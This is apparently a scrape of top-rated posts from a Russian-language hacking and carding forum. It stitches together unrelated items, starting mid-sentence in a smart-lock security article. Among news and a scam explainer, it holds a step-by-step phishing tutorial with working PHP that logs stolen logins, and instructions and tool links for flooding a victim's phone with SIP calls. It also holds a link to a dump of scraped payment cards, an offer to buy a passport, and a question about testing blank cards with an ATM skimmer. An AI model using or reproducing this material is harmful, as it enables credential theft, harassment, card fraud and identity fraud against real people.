замков, не так хороши. В тестах, проведенных Defcon в прошлом году, 12 из 16 моделей смарт-замков провалили тест при устойчивой атаке. Большинство из этих провалов касались либо реализации шифрования, либо низкопробного кода в сопутствующих приложениях. Почему это менее круто, чем казалось. Исходя из плохой конструкции и реализации защиты «Смарт» устройства, подобные этим, как правило, имеют нечеткие правовые границы, связанные с владением и обслуживанием. В прошлом году во время приобретения была закрыта компания по автоматизации домов, под названием Revolv. И вместо того, чтобы просто не предоставлять обновления, устройства были отключены. Это привело пользователей к неудобствам, но что, если это была бы ваша парадная дверь? Учитывая текущее состояние фрагментации мобильной ОС, было бы большим сюрпризом, если бы компания замка просто отказалась предоставлять обновления безопасности? Мы не смогли найти никакой информации о средствах обновления совместимых с новым Amazon замком, о том, как доверенный персонал по доставке, будет взаимодействовать с замками. И если какая-либо третья сторона имеет доступ к данным, передачи замка и / или к сопутствующих приложениям телефона. Это вопросы, которые касаются любого устройства. Но когда это устройство предоставляет доступ к вашему дому, значительно большая часть должна быть обязательно прозрачна в отношении базовой технологии устройства . Заключение У физического ригеля также есть недостатки в безопасности. Но ригеля имеют стандартизованный дизайн, общепринятые стандарты, по которым они оцениваются, и могут быть отремонтированы или заменены кем-либо и недвусмысленно принадлежат только вам. Может ли EULA смарт-замки сказать то же самое? Умные замки могут обеспечить достаточный уровень уверенности в покупке, если они отвечают следующим критериям: • Независимые отраслевые стандарты безопасности при проектировании • Независимый аудит кода • Без доступа к Wi-Fi сетям • Обычная реализация стандартного шифрования • Oтсутствие сторонних хранилищ данных; • Bозможность на ремонт
-
1 балл*Для автоматического дозвона выбираем "Гудок (ms)" Ссылки на весь нужный софт и сайты: Сам сайт - https://www.sipnet.ru Sip Killer - https://yadi.sk/d/4xUNSqs53PVfjz Виртуальный номер телефона - http://virtualsms.ru/ С помощью данного способа можно устроить настоящую DDOS атаку на телефон жертвы. Данные действия представлены лишь в ознакомительных целях, я не несу ответственность за возможные последствия такого рода хулиганства.
-
1 баллОбыск с извлечением компьютерной информации Своеобразие тактики и технических средств, применяемых для обнаружения и изъятия информации, хранящейся в оперативной памяти компьютера или на физических носителях, позволяет выделить новый вид обыска – обыск средств компьютерной техники. Такой обыск может производиться по делам о неправомерном доступе к информации, о создании вредоносных программ, о нарушении работы вычислительных комплексов, а также по любым делам, где требуется просмотр и изъятие документов, хранящихся не только на бумажных, но и на компьютерных носителях в виде файлов, подготовленных на данном компьютере, полученных с другого компьютера или отсканированных с бумажного документа. Перед обыском объекта, где по имеющейся информации находятся средства компьютерной техники (СКТ), желательно получить оперативную ориентировку по следующим вопросам: Количество СКТ на месте, где предполагается произвести обыск, наличие устройств бесперебойного питания. Сведения об используемых телекоммуникационных средствах: есть ли модем для связи компьютеров через телефонную сеть, объединены ли несколько компьютеров в локальную сеть внутри организации, имеется ли сервер – компьютер, который обслуживает остальные персональные компьютеры; есть ли подключение к региональной или глобальной сети. Часть этих сведений можно получить на основе предварительного анонимного посещения объекта, часть может сообщить провайдер – фирма – поставщик сетевых услуг. Наличие электронной связи в организации могут прояснить "шапки" бланков писем, реклама, прайс-листы и приглашения "посетить нашу Web-страницу в сети Internet". Профессиональный уровень обслуживания компьютера в организации или уровень владельца – пользователя компьютера, в том числе его профессиональные навыки в области вычислительной техники. Предусмотреть возможность или даже необходимость привлечь при обыске к сотрудничеству лицо, ответственное за эксплуатацию СКТ, а при наличии сети – сетевого администратора. Есть ли на СКТ программные или программно-аппаратные средства защиты от несанкционированного доступа. Если на СКТ имеются средства защиты, попытаться установить код доступа. Можно рассчитывать на последующие специальные приемы "взлома", поскольку некоторые популярные системы, в частности Windows, имеют слабые программные средства защиты и поддаются проникновению с использованием настроек или специальных программ. Выяснить, не защищает ли информацию электронный ключ – компактная электронная приставка размером со спичечный коробок, устанавливаемая на параллельный или последовательный порт (разъем) компьютера. Электронный ключ разрешает пользоваться защищенной программой и ее данными только при своем наличии. Возможно, компьютер защищен от доступа устройством чтения смарт-карт. Если на компьютере эти устройства предусмотрены, но в данный момент не подключены, можно предложить владельцу предъявить их добровольно или найти путем обычного обыска. Целесообразно обеспечить участие в обыске специалиста в компьютерной технике и информатике: программиста, системного аналитика, инженера по средствам связи или сетевому обслуживанию. По возможности в качестве понятых пригласить лиц, разбирающихся в компьютерной технике. В последние годы специалистов можно подобрать в солидных компьютерных фирмах с опытом услуг и преподавания на курсах по соответствующему профилю. Необходимо подготовить переносную аппаратуру для считывания и хранения изымаемой информации. С собой можно взять переносной компьютер и программное обеспечение, набор которого должен быть сформирован по совету с экспертами, а также переносные накопители информации со сменными носителями, способные вместить большой объем информации. Например: стример (ленточные кассеты), сменный жесткий диск, дисководы и диски сверхплотной записи (устройства Zip, arive, DVD) и т.п. Прийти на объект обыска лучше в момент максимального рабочего режима и срочно принимать меры по обеспечению сохранности СКТ и имеющихся на них данных. Необходимо распорядиться, чтобы персонал покинул рабочие места без прекращения работы техники и без завершения программ. Лучший вариант здесь – "оставить все как есть". На обзорной стадии обыска лицам, находящимся в помещении, запрещается прикасаться к включенным СКТ. Можно установить охрану, наблюдение, отделить находящихся на месте обыска сотрудников организации в определенной части помещения и т.д. Не разрешать выключать электроснабжение объекта. Если же электроснабжение на данный момент отключено, то перед его восстановлением желательно отключить от электросети всю компьютерную технику. Учитывается изображение, существующее на экране дисплея компьютера, если он включен. Если изображение на экране монитора выдает сообщение о текущем процессе удаления (уничтожения) информации, необходимо пойти на крайнюю меру – экстренно отключить компьютер от сети, а последующее включение провести с помощью специалиста. Необходимо занести в протокол названия программ, работавших в момент обыска, название и характер документов, с которыми шла работа. Следует определить, соединены ли СКТ, находящиеся на объекте обыска, в локальную вычислительную сеть и есть ли управляющий компьютер – сервер. Серверу нужно уделить особое внимание, так как там находится большой объем информации. Хотя и на рядовом компьютере сети (на рабочей станции) тоже может находиться собственная информация. В случае сетевого соединения с другим компьютером по внутренней сети или по глобальной - установить его сетевой адрес. Изымаются (при наличии) документы регистрации включения информационной системы и подключения к ней, журнал оператора ЭВМ, иные записи, относящиеся к работе на СКТ. В некоторых ситуациях, особенно перед изъятием, желательно составить для протокола план – эскиз помещения, указав на нем расположение СКТ. Возможно изъятие официальных планов или схем, составленных и утвержденных в самой организации. Подробно описывается порядок соединения между собой всех устройств, фиксируется наличие либо отсутствие используемого канала связи (модемы, сеть). Устанавливается тип связи, используемая в этих целях аппаратура, абонентский номер. Отмечается серийный номер (если он доступен) компьютера и его индивидуальные признаки. Рекомендуется исследовать, а при необходимости приобщать к делу магнитные носители информации: дискеты и жесткие диски, кассеты ленточных стримеров. В последнее время избранная информация может записываться по инициативе владельца на лазерный диск, поэтому при наличии таких дисков их тоже можно исследовать. В отдельных случаях при обыске нужно искать тайники, где могут храниться сменные компьютерные носители информации; с помощью специалиста вскрывать корпуса аппаратных средств компьютерной техники, чтобы обнаружить специально отключенные внутренние носители информации, например дополнительный жесткий диск. Если обыск проходит по делу о разработке программ в преступных целях, необходимо найти и изъять текст программы с компьютера или его распечатку. По делу о незаконном производстве пиратских программ для нелицензионного распространения без разрешения разработчика необходимо описать найденную "готовую продукцию", перечень программ, размещенных на лазерных дисках, попросить предъявить разрешение фирмы или автора на выпуск именно этой программной продукции. С другой стороны, в организациях при обыске можно определить по компьютеру перечень установленных программ и потребовать лицензию или другие документы, подтверждающие законность их использования. Установленной считается программа, которая извлечена из сжатого (архивного) состояния и – после прохождения этапа предупреждения о необходимости лицензионного использования ~ установлена (инсталлирована) в рабочий каталог. После выполнения указанных мероприятий можно приступить к поиску информации на компьютере. Машинные носители информации не читаемы визуально. В связи с этим следователь стоит перед дилеммой: изымать все СКТ "вслепую" и разбираться, есть ли на них значимая для дела информация после завершения обыска, или изучить с помощью специалиста на месте обыска содержащуюся на СКТ информацию, чтобы определить, что следует изъять. Значительную долю данных на компьютере занимают программы, а документы составляют только часть. Кроме технических сложностей существуют и экономические: в случае выхода из строя ЭВМ банк, как правило, может "продержаться" не более двух дней, оптовая фирма – 3-5, компания обрабатывающей промышленности – 4-8, страховая компания – 5-6 дней. В связи с этим радикальное изъятие компьютерной техники грозит последующими претензиями пострадавших организаций. Поэтому желателен экспресс – анализ информации, содержащейся на СКТ, который, кстати, целесообразен и для оптимизации дальнейших поисковых действий следователя. В ситуации, когда изъять СКТ и приобщить к делу в качестве вещественного доказательства невозможно либо нецелесообразно, следует распечатать интересующую информацию на принтере либо скопировать интересующие следствие сведения на дискеты, а большой объем информации – на стример, на переносной диск сверхбольшой емкости типа Zip или даже на дополнительный жесткий диск. Не изымая весь компьютер, можно изъять из системного блока жесткий диск, провести контрольную распечатку идентификации принтера на нескольких видах бумаги. В организациях с большим объемом информации может применяться резервное копирование на выделенный компьютер, который надо отсоединить от сети и временно расположить в отдельной комнате для исследования в ближайшие дни. Понятым даются необходимые пояснения. "Средний" пользователь обычно не догадывается, что фрагменты или целые файлы, которые программы создают как временную подсобную базу для работы, нередко остаются на диске и после окончания работы. Во всяком случае, такие хранилища обрывков временных файлов целесообразно проверять при обыске. Популярный программный пакет Microsoft Office после установки на компьютере ведет негласный файл – протокол, куда заносит дату и время всех включений компьютера. Программы связи и работы с сетью запоминают адреса многих интернет – контактов пользователя, документы электронной почты с адресами отправителя. Остающиеся на месте обыска СКТ можно опечатать путем наклеивания листа бумаги с подписями следователя и понятых на разъемы электропитания, на крепеж и корпус. Не допускается пробивать отверстия в магнитных носителях, ставить на них печати. Пояснительные надписи на этикетку для дискет наносятся фломастером, но не авторучкой или жестким карандашом. Если есть необходимость изъять СКТ после обыска, следует выйти из программы, исполняемой компьютером для операционной системы Windows, правильно завершить работу самой системы, а затем отключить электропитание всех средств компьютерной техники, подлежащих изъятию. Как уже отмечалось, желательно описать в протоколе рабочие кабельные соединения между отдельными блоками аппаратуры. Аппаратные части СКТ разъединяются с соблюдением необходимых мер предосторожности, одновременно пломбируются их технические входы и выходы. При описании изымаемых магнитных носителей машинной информации в протоколе отражается заводской номер, тип, название, а при их отсутствии подробно описываются тип, размер, цвет, надписи. Фиксацию указанных сведений в протоколе обыска желательно дополнить видео съемкой либо фотосъемкой. Магнитные носители информации при транспортировке и хранении не должны оказаться вблизи мощных магнитных полей.
-
1 баллНет, майнить на обычных ПК у тебя не получится , они должны быть правильно настроены .
-
1 баллТемные дела в 90-х отличались от нынешних очень сильно. Не было тогда рампов, рунионов, по интернету практически не работали. Вся жестокость была в реальной жизни. Круговая порука, жестокость и убийства - это были синонимами бизнесу в 90-х.
-
1 баллА в чем смысл схемы то? про манинг уже давно всем все известно!
-
1 баллКак сообщает блог MDSN, в релизе Windows 10 Fall Creators Update (FCU), намеченном на осень 2017 г., Windows Subsystem for Linux (WSL) станет полноценной функцией Windows. Участники программы Windows Insider могут заметить, что в последней сборке (16251) WSL больше не имеет статуса бета. Это означает, что подсистему Linux уже можно использовать как полноценный компонент инструментального набора Windows 10. WSL позволяет работать с инструментами командной строки Linux, инициировать из неё процессы Windows и получать доступ к файлам Windows. Также можно инициировать процессы Linux из CLI Windows (файлы Linux пока недоступны из Windows — Microsoft работает над устранением этой проблемы).Компания подчеркивает, что дистрибутивы Linux работают поверх WSL в интерактивных сценариях. Подсистема не рассчитана на запуск рабочих нагрузок Apache/nginx/MySQL/MongoDB и пр. Также пока не имеется планов поддержки в ней приложений X/GUI, десктопов и серверов.С завершением бета-тестирования о всех проблемах в WSL теперь можно сообщать по стандартным каналам поддержки и использовать приложение Windows 10 Feedback Hub для связи с командой разработчиков.Напомним, что запуск родных исполняемых файлов Linux реализован через специальную прослойку, транслирующей системные вызовы Linux в системные вызовы Windows на лету, т. е. представляет собой обратный аналог системы Wine. Изначально предлагаемое пользователю окружение основано на пакетной базе Ubuntu. Canonical и Microsoft добавили возмoжность запуска Ubuntu поверх Windows 10 для того, чтобы предоставить системным администраторам и разработчикам возможность использования bash и других Linux-инструмeнтов и утилит, таких как make, gawk и grep, непосредственно в Windows.Месяцем ранее Microsoft добавила в Windows Store SUSE Linux Enterprise Server 12 и openSUSE Leap 42. После их установки у пользователей Windows появится возможность работать с окружением Linux в виртуальной песочнице как на отдельно установленной ОС со всеми её функциональными возможностями, но без необходимости отдельного запуска Linux-загрузчика. Дистрибутивы SLES 12 и openSUSE Leap 42 станут доступны и пользователям Windows 10 S.
-
1 балл
-
1 баллСпарсил маленько СС ...на валид не трогал,да и не надо мне) https://www.sendspace.com/file/azo5dc
-
1 баллМогу ли я на себя принять Вестер юнион?Опасно будет?
-
1 баллКак не шифруй но гребанное яблоко тебя сдаст.Он и придуман чтобы контролировать население
-
1 балл
-
1 баллОбучение прошел,все на высоте.Многое открыл и узнал для себя.Что больше понравилась дак это практика,объяснил все доступно по тиемвари.Не жалею что вложился в обучение.Обязательно их отработаю!
-
1 баллВсем привет. Сегодня покажу вам как сделать фейк, многие мануалы не понятно расписаны новичкам, потому-что в них требуются хотя бы начальное знание азов HTML. Чтож в моем обучающем мануале, такого не будет, распишу все очень очень понятно. Ну все начали)) Заходим на страницу, которую нам надо подделать. Нажимаем CTRL+S Все мы сохранили страницу. Можем сделать так: сохранить как Если картинки не грузятся, то просто скачиваем их, или скриним. Потом в скачанном файле, прописываем путь к ним. Или же способ немного лучше, но потруднее: Открываем исходный код делается это так CTRL+U Прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака. Теперь открываем блокнотом или любым другим редактором. Займемся поиском тегов, которые относятся к Логину и Паролю [Ведь смысл фейка красть логин и пароль] меняем значение аттрибута action на Submit.php Слово action можно найти воспользовавшись поиском. Получится так >>> action="submit.php" Сейвимся, Клосаем. Делаем файл submit.php Пишем туда следующее: <?php /** * xakarders.ru * Это я вам CyKa фейк сделал * vzlom.htm */ @include 'config.php'; $req=array( 'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'], 'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'], 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'], 'REQUEST_URI'=>$_SERVER['REQUEST_URI'], 'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'], ); $desc=fopen('logs.txt','at+'); fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n"); fclose($desc); header('Location: '.$loc); ?> Создаем файл config.php <?php /** * Это я вам CyKa фейк сделал * vzlom.htm */ // Сюда впишите ссылку на переадресацию: $loc='http://suka.ru'; ?> Остался самый последний штрих. Создаем наш корзинку, куда получим данные. А т.е. logs.txt Теперь создаем аккаунт на любом бесплатном хостинге. Заливаем через FTPешку, Везде поставьте полномочия 777, иначе пароли не придут. Впариваем жертве. И ОК. Получаем пароль в корзинку.
-
1 балллимиты выше,т.е тебе сразу ведь не дадут большую сумму,вот мы и доверие вызываем у них)))
-
1 баллУ меня кореша так развели на 20 к,только кароче у него акк в вк угнали и спиздили переписку с любовницей
-
1 баллКуплю паспорт, прописка республика Башкортостан мужчина 83-89 г.р переклей не предлагать! сделка через гаранта. рассмотрю все варианты. о цене договоримся. связь paradoxxx0404@gmail.com
-
1 баллСогласен, что пробовать стоит именно так. Проникновение интернета в общество увеличивается с каждым днем. Для электронной версии журнала затрат понадобиться минимум. Опыта наберетесь. С другой стороны, на полновесный журнал требуется достаточно много материала, желательно креативного, а не сплошного рерайта. Найдете ли в себе силы? Ну, а прежде всего, стоит, пожалуй, походить по тематическим форумам.
-
1 баллА у меня есть книги старинные, которым больше ста лет. Убирался на даче, нашёл их. В очень хорошем состоянии. Посмотрел в интернете их стоимость и решил продать. Описал подробно на сайте, который занимается продажами антикварных книг. Но пока ни одного предложения о покупке не получил.
-
1 баллВсе очень просто. В налоговой после регистрации вас должны были прикрепить к инспектору, спросите у него кто занимается ККМ. Этот человек должен дать вам все подробные инструкции. Где купить и как оформить. Но учтите, даже если вы не будете какое-то время использовать ККМ, но заведете ее вам придется платить за обслуживание. Сейчас, если не ошибаюсь это около 700 руб. в месяц. Если вы будете совершать операции без ККМ вы рискуете нарваться на штраф 40000 руб. Есть способ не использовать ККМ. Есть документ (кажется закон) о бланках строгой отчетности. Да, в законе о ККМ, есть перечень операций по которым можно принимать оплату с использованием БСО. Есть специально утвержденные формы. Нужную вам должны дать в налоговой. Вы заказываете их печать в типографии (не все типографии имеют право печатать БСО), регистриркуете их приход в спец. журнале и работаете.
-
1 баллраньше когда всё аккуратно делаешь, ни чего такого не было. у тебя вцц оплатилась? что именно из документов попросили? сделал одну вцц - забыл про аккаунт. как вышло у дубравы. - выходит что уже да.
-
1 балл
-
1 баллЧем лучше зашифровать данные на определенном диске, в идеале сделать так чтобы при неправильно введенном пароле (после трех попыток), все данные автоматически уничтожались.
-
1 балл
-
1 балл
-
1 баллЗа последнее время достаточно часто в прессе и не телевидении вспыхивают скандалы, связанные с договорными матчами. Периодически трясет итальянское футбольное сообщество, за кулисами теннисного мира тоже нет нет, да и пройдет слушок о том, что тот или иной игрок слил матч. В России пока все тихо, хотя все прекрасно понимают, что если договорные матчи случаются даже в цивилизованной Европе, то нам сам бог велел. Все это прекрасно понимают, и поэтому некоторым особо азартным игрокам приходит мысль попытаться заработать на договорных матчах. Надо сказать, что мысль эта приходит в голову чаще всего после очередного большого проигрыша и от большого желания отыграться любыми способами. А почему бы и нет. Ведь кто-то явно на этом зарабатывает, так почему бы и мне не попробовать. Дело остается за малым. Как узнать какой матч договорной, а какой нет, ведь понятно, что никто за бесплатно такую информацию не предоставит. Ну путь даже платно, думает игрок, главное, чтобы расходы потом окупились. Однако все равно не понятно кому платить, ведь на улице никто не стоит с табличкой: продаю информацию о договорных матчах. А почему бы не поискать информацию в Интернете. Всемирная паутина все знает и там наверняка можно найти таких специалистов. Набирает наш игрок в Яндексе фразу договорные матчи и начинает просматривать сайты. Так вот конечный результат будет печальным, потому что любой продавец информации о договорных матчах - мошенник. Лучше сразу выбросить эту навязчивую идею из головы и попытаться найти для себя более реальный заработок в Интернет. Как работает эта схема? Вы попадаете на сайт мошенника или на форум, на котором читаете следующее: продаем информацию о договорных матчах или что-то подобное. Ага, то, что нужно надо расспросить поподробнее. На ваш вопрос мошенник отвечает, что да действительно он располагает такой информацией. Вот например через пару дней будет договорной матч по футболу во втором дивизионе. То, что дивизион второй, а не высший не случайно, потому что подсознательно вы понимаете, что договорные матчи существуют, но знают об этом единицы, и информация стоит дорого, а вот второй дивизион - это другое дело, думаете вы. Все наживка проглочена, простачок попался, а на все остальные вопросы, которые могут у вас возникнуть, у мошенников готов ответ. Договорные матчи. Приблизительный диалог с мошенником. Вопрос: Какие гарантии, спросите вы? Ответ: У нас на сайте выложены скриншоты ставок на договорные матчи, отвечают мошенники. Комментарий: Извините, как можно проверить, что матч был договорной, да никак. Ну разместил мошенник пару картинок со своими выигравшими ставками, а может даже и не со своими а чужими, найденными в Интернете. Какое это доказательство правдивости информации? Да никакое! Или такой ответ: Да и потом если ставка не сыграет, случаются форс-мажорные обстоятельства, мы вернем вам деньги или дадим следующий прогноз бесплатно. Комментарий: Возможно кстати, что вернут и даже дадут прогноз бесплатно, они то в отличие от вас ничего не проиграют, потому что ставок не делают, и в отличие от вас своими деньгами не рискуют. Вопрос: Откуда вы берете информацию о договорных матчах? Ответ: Все мошенники утверждают, что имеют отношение к спорту, были или судьями или тренерами, но теперь отошли от спорта, но обширные связи у них естественно остались. Комментарий: И так все понятно, оставим без комментариев Вопрос: А почему вы сами не делаете ставки, а продаете информацию. Ответ: Мы ставим, но дело в том, что максимальная сумма ставок ограничена, поэтому для того, чтобы заработать больше, мы продаем информацию. Комментарий: Да конечно максимальная сумма ставок ограничена, но извините, букмекерских контор сотни, если не тысячи, так что информацию не обязательно продавать, можно сделать ставку в десяти или двадцати конторах, можно в сотне. А потом есть еще vip ставки, на них ограничения не распространяются. Вы можете задать еще какие-то вопросы, но будьте уверены, мошенники найдут на них убедительные ответы. Информация о договорных матчах. Цена. Цена таких прогнозов зависит только от наглости мошенников. Прогноз может стоить пять долларов, а может пару сотен, но в не зависимости от цены результат будет одинаков. Вы проиграете свои деньги. Почему? Давайте посмотрим схему в цифрах. Договорные матчи. Мошенничество на букмекерских ставках. Цифры. Итак, допустим, вы согласились купить информацию за 100 долларов. Кроме вас мошенник нашел еще семь человек, которые ему заплатили тоже по 100 долларов. Что делает мошенник, мошенник берет абсолютно любой матч с двумя исходами и четырем участникам сообщает, что выиграет Команда1, а четырем другим, что выиграет команда2. В результате этой нехитрой операции мошенник получит четыре ругательных письма от проигравших и вернет им деньги и четыре благодарности от выигравших, ну соответственно и 400 долларов премиальные себе. Далее схема повторяется, только теперь оставшиеся четверо опять делятся пополам, и мошенник кладет в карман себе еще 200 долларов. На третьем этапе еще 100. Итого за один цикл чистый доход мошенника составил 400+200+100=700 долларов. В реальности кстати схема несколько сложнее и доход афериста больше, потому что никому деньги не возвращаются, а просто предлагается еще один бесплатный прогноз, и игроки, слепо веря мошенникам, продолжают проигрывать свои деньги.
-
1 баллДопустим, Вы нашли информацию о договорном матче и купили ее за 1000 рублей. Кроме Вас мошенник нашел, допустим, еще 15 желающих легкого заработка. Половине из вас он разошлет сообщения о победе первой команды (игрока), а второй половине - о победе второй команды (имеется в виду двухисходный матч). После первого тура, за который он заработал 15000 рублей, у него останется 8 счастливых подписчиков, с которых он получит в следующем туре еще 8000 рублей. Таким образом, перед тем, как начинать подыскивать новых доверчивых простаков, мошенник обогатится за чужой счет на 16000+8000+4000+2000+1000=31000 руб. В реальности данная схема несколько сложнее
-
1 баллВо Владикавказе задержан ученик 10 класса, сбивший на чужом BMW двух женщин с ребенком, сообщает "Интерфакс" со ссылкой на МВД Северной Осетии. Владелец машины также задержан. Как сообщается на сайте североосетинского МВД, авария произошла вечером 31 января. BMW выехал на полосу встречного движения, сбил двух женщин и трехлетнего мальчика, после чего скрылся с места происшествия. Ребенок от полученных травм скончался на месте, женщины были доставлены в больницу. Спустя час машина была найдена. Выяснилось, что ей управлял 16-летний десятиклассник 44-й школы Владикавказа. По данным "Интерфакса", его зовут Борис Джелиев. Владельцем машины оказался 24-летний водитель такси Тимур Дзантиев. В МВД отметили, что он передал управление машиной несовершеннолетнему незаконно. По данным "Комсомольской правды", Джелиев уговорил своего знакомого дать ему ключи от BMW, так как хотел произвести впечатление на девушку, которую он пригласил на свидание. Сбитые женщины, по информации издания, работают в министерстве экологии и природных ресурсов Северной Осетии.
-
1 баллНикто не знает почему банкомат не хочет брать, чистый белый пластик Lo-Co? нужно проверить как карта будет входить, выходить со скимером не буду же свою карту палить, или может кто знает что за датчики стоят?
-
1 балл